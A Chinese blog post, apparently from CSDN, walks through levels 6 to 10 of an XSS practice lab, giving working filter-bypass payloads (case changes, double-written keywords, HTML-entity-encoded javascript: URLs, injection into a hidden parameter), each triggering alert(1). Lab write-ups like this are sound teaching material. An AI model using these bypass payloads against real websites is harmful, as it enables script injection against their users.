xss入门闯关详解6-10关

最新推荐文章于 2024-04-30 05:17:19 发布
最新推荐文章于 2024-04-30 05:17:19 发布
阅读量259 收藏
点赞数
文章标签: javascript web xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/New_Ss_/article/details/112534671
版权

继续进行6-10关

第6关

简单的尝试之后发现闭合掉了
在这里插入图片描述在这里插入图片描述尝试空格或者大小写,tab绕过,大小写成功绕过在这里插入图片描述" Onclick="alert(1)

第七关

在这里插入图片描述

老样子

value=""> click='alert(1)">
value=""><>alert(1)</>">
value=""><a =java:alert(1)>123</a>">

闭合的一塌糊涂。这里是直接吧敏感的标签删除了,比如删除了on,script直接删掉了。既然删除,那么容易想到双写绕过,删除之后恰好剩下我们想要的内容在这里插入图片描述" oonnclick="alert(1)
script可以通过同样的方法绕过,这里不再举例,大家可以试一试。

第8关

在这里插入图片描述<a href="' o_nclick='alert(1)">友情链接</a></center>
我们输入的会直接在href标签内输出构成锚点链接,这里只要能都在=后边输入弹窗就ok类似于第五关。但是script被无情闭合掉了
在这里插入图片描述
双写大小写一样没防住了。这里我们可以换一些新思路,例用html代码绕过,把被检测的标签经过编码之后可以逃过去。
https://www.qqxiuzi.cn/bianma/zifushiti.php
比如这里它检测了script,我们可以把script经过编码得到
&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;
前后加上java:、alert(1)即可。

java&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert(1)

当然之更改个别字母,或者全更改也可。

第9关

在这里插入图片描述

梅开二度测试,发现提示链接不合法,经过多次尝试,发现链接需要包含http://加上就好了

payload=javascrip&#116;:alert(/xss/)//http://

第10关

这一关有点搞,在这里插入图片描述
源码发现有三个输入点被hidden了(在html标签中,意思为隐藏)
在这里插入图片描述尝试分别向他们传参,

?t_link=1 &t_history=1&t_sort=1

在这里插入图片描述
可以看到t_sort成功的输出了,接下来就好办了

?t_sort=" οnclick=alert(1) type="text

此处后边加上type=text 的目的是为了令输入框显示出来,可以触发“onclick”这一事件,当然可以搭配别的标签,不用后边加type

Hbhoo
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
xss闯关(1-20)
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
06-10 583
XSS(Cross-Site Scripting)是一种常见的Web攻击技术,攻击者通过注入恶意代码,使得在用户访问受到攻击的网站时执行并影响用户的浏览器。XSS攻击通常被用于盗取用户信息、会话劫持、篡改网站内容等非法目的。
Xss小游戏通攻略带解释
sirius的博客
08-28 5453
Xss小游戏通攻略 实验环境:xss小游戏源码+phpstudy 源码地址:https://files.cnblogs.com/files/Eleven-Liu/xss%E7%BB%83%E4%B9%A0%E5%B0%8F%E6%B8%B8%E6%88%8F.zip 实验步骤:启动phpstudy,浏览器访问127.0.0.1/xss/后提示点击图片进入第一。 第一:输入的变量直接被输出,直接构造payload即可。 http://127.0.0.1/xss/level1.php?.
XSS-Game 通教程,XSS-Game level1-18,XSS靶场通教程_xss靶场level
最新发布
2401_84186109的博客
04-30 627
3)第三步:弹窗测试,回车即可弹窗,自动进入下一。4)从源码可以看到,第一没有任何过滤。​​​​​​​​。
【网络安全 --- xss-labs靶场通(1-10)】详细的xss-labs靶场通思路及技巧讲解,让你对xss漏洞的理解更深刻
m0_67844671的博客
10-21 4587
【网络安全 --- xss-labs靶场通(1-10)】详细的xss-labs靶场通思路及技巧讲解,让你对xss漏洞的理解更深刻
XSS-Game level 10
热门推荐
wangyuxiang946的博客
07-08 1万+
xssgame10XSS-Game第十过滤了尖括号 > < , 并且隐藏了输入框 , 使用事件绕过,并使输入框取消隐藏
XSS-Game 通教程,XSS-Game level1-18,XSS靶场通教程
wangyuxiang946的博客
01-07 1万+
XSS-Game level1 XSS-Game level2 XSS-Game level3 XSS-Game level4 XSS-Game level5 XSS-Game level6 XSS-Game level7 XSS-Game level8 XSS-Game level9 XSS-Game level10 XSS-Game level11 XSS-Game level12 XSS-Game level13 XSS-Game level16 XSS-Game level17
xss challenge 下载 xss 实践通小游戏,以闯关的形式检验xss掌握程度。
04-27
xss challenge 下载 xss 实践通小游戏,以闯关的形式检验xss掌握程度。
xss闯关小游戏.zip
02-25
这是一款利用xss漏洞闯关的小游戏,无需连接数据库,共20,非常适合网络安全攻防的初学者练习使用,使用及安装教程请看此链接,https://editor.csdn.net/md?articleId=104496122 欢迎各位小伙伴下载
xss闯关挑战
11-09
这个是XSS闯关文件,解压后放在服务器的对应文件夹即可。 闯关笔记我博客中有记录,新手可以参考。 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如...
1ncrd#Study-Record#BUUCTF[第二章 web进阶]XSS闯关1.md
08-10
一些xss的payload
XSS-10注入靶场闯关(小游戏)——第十
qq_39330735的博客
02-04 345
XSS-game-10隐藏入口注入,需要在源代码查找到入口的html标签,然后修改对应的属性让其显示出来。然后再注入payload
XSS闯关游戏
qq_28468749的博客
03-01 312
测试payload查看网页源代码发现:和第五几乎一样,只不过第一个O成了大写,所以先试用。差异就是script、字母没有被过滤,大小写敏感,尖括号、双引号被编码了。查看网页源代码,比上一多了一个ref参数,仿写上一的payload注入网页并无变化。查看网页源码,尖括号、双引号、单引号都被编码了,但是单引号没有被编码,所以考虑。尖括号、双引号都被编码了,从下面href的值也可以看出script会被规避。在hackbar上进行输入值测试,查看网页源代码,是ua的参数值,抓包!是个成功且合法的链接了!
xss challenges闯关详细(6-10
zsynbw的博客
10-28 584
xss challenges闯关详细
BuuCTF[第二章 web进阶]XSS闯关
m_de_g的博客
07-27 5386
** [第二章 web进阶]XSS闯关 ** 一、解题思路 1.一来看了一下题目的说明 我们需要执行alert函数 那就开启闯关模式,第一,一看这个URL就很奇怪没直接上手,二话没说成功下一 http://491c2e5e-9e61-408a-b82d-6615548d150b.node4.buuoj.cn/level1?username=<script>alert('xss')</script> 通过观察url,我惊奇的发现闯关卡,是由level1,level2…,我
XSS Challenges闯关1-6
linxaiomo
04-07 1025
第一: 靶场链接:XSS Challenges (by yamagata21) - Stage #1 第一截图:(翻译为中文后) 选中Hint查看提示:显示非常容易,但是图中显示必须要用alert(document.doman)完成,我们优先考虑xss的常规操作,直接用script标签完成alert弹出。 Hint: very simple... 看到图中的搜索框,输入弹窗xss <script>alert(document.domain)</script&g..
渗透测试之---xss-labs闯关【1-14
qq_43168364的博客
04-18 2943
万能检测语句 <SCRscriptIPT>’”()Oonnjavascript 这条语句将给我们本次的闯关之旅带来极大的帮助 第一 [Payload:<script>alert(/pig/)</script>] 首先看到了有查询字符串,我们心花怒放了。 先万能检测一下 好家伙啥都没有过滤,那就很easy了 第二 [payload: ”>&......
xss挑战(超详细小白)
weixin_64655821的博客
09-22 1335
xss挑战前十
Xss-labs闯关总结
未完成的歌~的博客
07-13 7634
文章目录前言:Level 1 无过滤机制查看后台源码:通代码:Level 2 闭合标签查看后台源码:通代码:Level 3 单引号闭合 + 添加事件查看后台源码:通代码:Level 4 双引号闭合 + 添加事件查看后台源码:通代码:Level 5 新建标签查看后台源码:通代码:Level 6 大小写绕过查看后台源码:通代码:Level 7 双写绕过查看后台源码:通代码:Level 8 编码绕过查看后台源码:通代码:Level 9 检测键字查看后台源码:通代码:Level 10 隐藏信息查

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值